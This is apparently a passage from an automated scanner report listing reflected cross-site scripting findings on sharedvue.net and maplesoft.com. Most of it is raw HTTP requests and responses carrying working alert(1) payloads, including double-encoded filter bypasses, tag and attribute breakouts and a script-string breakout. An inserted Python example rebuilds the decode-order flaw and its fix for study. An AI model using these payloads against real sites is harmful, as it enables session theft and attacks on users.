The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29360%253cscript%253ealert%25281%2529%253c%252fscript%253ec5d404e0e7 was submitted in the REST URL parameter 4. This input was echoed as 29360<script>alert(1)</script>c5d404e0e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/tick29360%253cscript%253ealert%25281%2529%253c%252fscript%253ec5d404e0e7/370965861.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 308
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:05:30 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:05:30 GMT


<strong>/sharedvue/dyn/tick29360%3cscript%3ealert%281%29%3c%2fscript%3ec5d404e0e7/370965861.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tick29360<script>alert(1)</script>c5d404e0e7/370965861.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.9. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965876.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965876.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c4192%253cscript%253ealert%25281%2529%253c%252fscript%253e38c130dc4ec was submitted in the REST URL parameter 4. This input was echoed as c4192<script>alert(1)</script>38c130dc4ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/tickc4192%253cscript%253ealert%25281%2529%253c%252fscript%253e38c130dc4ec/370965876.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:05:38 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:05:38 GMT


<strong>/sharedvue/dyn/tickc4192%3cscript%3ealert%281%29%3c%2fscript%3e38c130dc4ec/370965876.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickc4192<script>alert(1)</script>38c130dc4ec/370965876.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.10. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965891.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965891.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c6393%253cscript%253ealert%25281%2529%253c%252fscript%253e7dace5d5f19 was submitted in the REST URL parameter 4. This input was echoed as c6393<script>alert(1)</script>7dace5d5f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/tickc6393%253cscript%253ealert%25281%2529%253c%252fscript%253e7dace5d5f19/370965891.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:09 GMT


<strong>/sharedvue/dyn/tickc6393%3cscript%3ealert%281%29%3c%2fscript%3e7dace5d5f19/370965891.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickc6393<script>alert(1)</script>7dace5d5f19/370965891.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.11. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965906.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965906.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload af64a%253cscript%253ealert%25281%2529%253c%252fscript%253e4038a418d9e was submitted in the REST URL parameter 4. This input was echoed as af64a<script>alert(1)</script>4038a418d9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/tickaf64a%253cscript%253ealert%25281%2529%253c%252fscript%253e4038a418d9e/370965906.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:09 GMT


<strong>/sharedvue/dyn/tickaf64a%3cscript%3ealert%281%29%3c%2fscript%3e4038a418d9e/370965906.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickaf64a<script>alert(1)</script>4038a418d9e/370965906.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.12. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965921.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965921.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f01e5%253cscript%253ealert%25281%2529%253c%252fscript%253eb054ae797c1 was submitted in the REST URL parameter 4. This input was echoed as f01e5<script>alert(1)</script>b054ae797c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/tickf01e5%253cscript%253ealert%25281%2529%253c%252fscript%253eb054ae797c1/370965921.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:19 GMT


<strong>/sharedvue/dyn/tickf01e5%3cscript%3ealert%281%29%3c%2fscript%3eb054ae797c1/370965921.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickf01e5<script>alert(1)</script>b054ae797c1/370965921.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.13. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965936.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965936.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a342f%253cscript%253ealert%25281%2529%253c%252fscript%253e8dc35401c8a was submitted in the REST URL parameter 4. This input was echoed as a342f<script>alert(1)</script>8dc35401c8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/ticka342f%253cscript%253ealert%25281%2529%253c%252fscript%253e8dc35401c8a/370965936.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:26 GMT


<strong>/sharedvue/dyn/ticka342f%3cscript%3ealert%281%29%3c%2fscript%3e8dc35401c8a/370965936.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/ticka342f<script>alert(1)</script>8dc35401c8a/370965936.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.14. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965951.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965951.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c4240%253cscript%253ealert%25281%2529%253c%252fscript%253ebd830fac3e6 was submitted in the REST URL parameter 4. This input was echoed as c4240<script>alert(1)</script>bd830fac3e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/tickc4240%253cscript%253ealert%25281%2529%253c%252fscript%253ebd830fac3e6/370965951.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:28 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:29 GMT


<strong>/sharedvue/dyn/tickc4240%3cscript%3ealert%281%29%3c%2fscript%3ebd830fac3e6/370965951.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickc4240<script>alert(1)</script>bd830fac3e6/370965951.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.15. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965966.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965966.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63cf8%253cscript%253ealert%25281%2529%253c%252fscript%253e3d0d1c1d791 was submitted in the REST URL parameter 4. This input was echoed as 63cf8<script>alert(1)</script>3d0d1c1d791 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/tick63cf8%253cscript%253ealert%25281%2529%253c%252fscript%253e3d0d1c1d791/370965966.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:43 GMT


<strong>/sharedvue/dyn/tick63cf8%3cscript%3ealert%281%29%3c%2fscript%3e3d0d1c1d791/370965966.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tick63cf8<script>alert(1)</script>3d0d1c1d791/370965966.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.16. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965981.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965981.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e166%253cscript%253ealert%25281%2529%253c%252fscript%253ef8a4a5e1112 was submitted in the REST URL parameter 4. This input was echoed as 7e166<script>alert(1)</script>f8a4a5e1112 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
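Worked example, added by the editor and not part of the XSS.CX report or of the ptc.sharedvue.net application: a Python reconstruction of the decode-order flaw that findings 1.10 to 1.16 share. The payload strings are copied from finding 1.10; the block-list characters, the allow-list pattern for a tick identifier and the two handler functions are assumptions made for illustration.

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs: the scanner's payload from finding 1.10, double-encoded
# as submitted and single-encoded as the server sees it after one decode.
DOUBLE_ENCODED = "c6393%253cscript%253ealert%25281%2529%253c%252fscript%253e7dace5d5f19"
SINGLE_ENCODED = "c6393%3cscript%3ealert%281%29%3c%2fscript%3e7dace5d5f19"

# Assumption: the characters the application's block-list rejects.
BLOCKED = set('<>"\'')
# Assumption: what a tick identifier path segment is allowed to look like.
SEGMENT_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def server_decode(raw_segment: str) -> str:
    """The single URL-decode the web server applies before the application sees the path."""
    return unquote(raw_segment)


def second_decode(value: str) -> str:
    """A custom, redundant decode of an already-decoded value (the step the report advises removing)."""
    return unquote(value)


def vulnerable_handler(raw_segment: str) -> str:
    """Reconstruction of the behaviour the report infers: validate, decode again, emit raw."""
    value = server_decode(raw_segment)      # %253c -> %3c: no '<' yet, so the check passes
    if BLOCKED & set(value):
        return "rejected"
    value = second_decode(value)            # %3c -> '<': happens after validation
    return f"Redirect to: /sharedvue/tick{value}/370965891.gif"


def fixed_handler(raw_segment: str, custom_canonicalise=None) -> str:
    """Decode once; if any custom canonicalisation exists, run it before validation; encode on output."""
    value = server_decode(raw_segment)
    if custom_canonicalise is not None:
        value = custom_canonicalise(value)  # canonical form first ...
    if not SEGMENT_RE.fullmatch(value):     # ... then validate what will actually be used
        return "rejected"
    return f"Redirect to: /sharedvue/tick{html.escape(value, quote=True)}/370965891.gif"


if __name__ == "__main__":
    print(vulnerable_handler(SINGLE_ENCODED))            # rejected
    print(vulnerable_handler(DOUBLE_ENCODED))            # ...tickc6393<script>alert(1)</script>7dace5d5f19...
    print(fixed_handler(DOUBLE_ENCODED))                 # rejected
    print(fixed_handler(DOUBLE_ENCODED, second_decode))  # rejected
    print(fixed_handler("370965891"))                    # Redirect to: /sharedvue/tick370965891/370965891.gif
```

The vulnerable handler checks the value after the server's single decode, when %253c has become the harmless-looking %3c, and only then decodes again. The fixed handler decodes once, runs any custom canonicalisation before the allow-list check so that validation sees the value that will actually be used, and HTML-encodes at the output point as a second line of defence.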

Request

GET /sharedvue/resources/dyn/tick7e166%253cscript%253ealert%25281%2529%253c%252fscript%253ef8a4a5e1112/370965981.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:58 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:58 GMT


<strong>/sharedvue/dyn/tick7e166%3cscript%3ealert%281%29%3c%2fscript%3ef8a4a5e1112/370965981.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tick7e166<script>alert(1)</script>f8a4a5e1112/370965981.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.17. http://search.maplesoft.com/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.maplesoft.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ecf21<script>alert(1)</script>94c0bacfe0a was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=xss%20txt%20css%20img%20help%20faqecf21<script>alert(1)</script>94c0bacfe0a HTTP/1.1
Host: search.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/contact/webforms/requestquote.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1034538322-1317672438708; mbox=check#true#1317672536|session#1317672433761-966952#1317674336|PC#1317672433761-966952.19#1320264476; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Connection: Close
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Mon, 03 Oct 2011 20:08:16 GMT
Content-Length: 42520

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<title>Maplesoft Site Search Results: xss txt css img help faqecf21<script>alert(1)</script>94c0bacfe0a</titl
...[SNIP]...
<font color="#ffffff">xss txt css img help faqecf21<script>alert(1)</script>94c0bacfe0a</font>
...[SNIP]...

1.18. http://search.maplesoft.com/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.maplesoft.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload bb81b</title><script>alert(1)</script>996cd7acc25 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=xss%20txt%20css%20img%20help%20faqbb81b</title><script>alert(1)</script>996cd7acc25 HTTP/1.1
Host: search.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/contact/webforms/requestquote.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1034538322-1317672438708; mbox=check#true#1317672536|session#1317672433761-966952#1317674336|PC#1317672433761-966952.19#1320264476; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Connection: Close
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Mon, 03 Oct 2011 20:08:19 GMT
Content-Length: 42574

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<title>Maplesoft Site Search Results: xss txt css img help faqbb81b</title><script>alert(1)</script>996cd7acc25</title>
...[SNIP]...

1.19. http://search.maplesoft.com/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.maplesoft.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91147"><script>alert(1)</script>75923144cb3 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=xss%20txt%20css%20img%20help%20faq91147"><script>alert(1)</script>75923144cb3 HTTP/1.1
Host: search.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/contact/webforms/requestquote.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1034538322-1317672438708; mbox=check#true#1317672536|session#1317672433761-966952#1317674336|PC#1317672433761-966952.19#1320264476; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Connection: Close
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Mon, 03 Oct 2011 20:08:14 GMT
Content-Length: 42536

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<title>Maplesoft Site Search Results: xss txt css img help faq91147"><script>alert(1)</script>75923144cb3</ti
...[SNIP]...
<input type="text" name="q"
size="32" maxlength="256" value="xss txt css img help faq91147"><script>alert(1)</script>75923144cb3">
...[SNIP]...

1.20. http://www.maplesoft.com/products/maple/new_features/index.aspx [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maplesoft.com
Path:   /products/maple/new_features/index.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a7b"%3balert(1)//97e7ce188ef was submitted in the p parameter. This input was echoed as 92a7b";alert(1)//97e7ce188ef in the application's response. The same unescaped value is also written into the MTC cookie (see the Set-Cookie header in the response below), so the parameter reaches both the inline script block and the client's cookie store.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/maple/new_features/index.aspx?p=TC-194592a7b"%3balert(1)//97e7ce188ef HTTP/1.1
Host: www.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=4ihl4e55nrxjtk45j4qxvoum; .Country=US; s_cc=true; mbox=check#true#1317672494|session#1317672433761-966952#1317674294|PC#1317672433761-966952.19#1320264438; __qca=P0-1034538322-1317672438708; s_sq=maplesoftcom%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.maplesoft.com%25252Fproducts%25252Fmaple%25252Fnew_features%25252Findex.aspx%25253Fp%25253DTC-1945%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MTC=TC-194592a7b";alert(1)//97e7ce188ef; domain=.maplesoft.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:07:58 GMT
Content-Length: 94772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
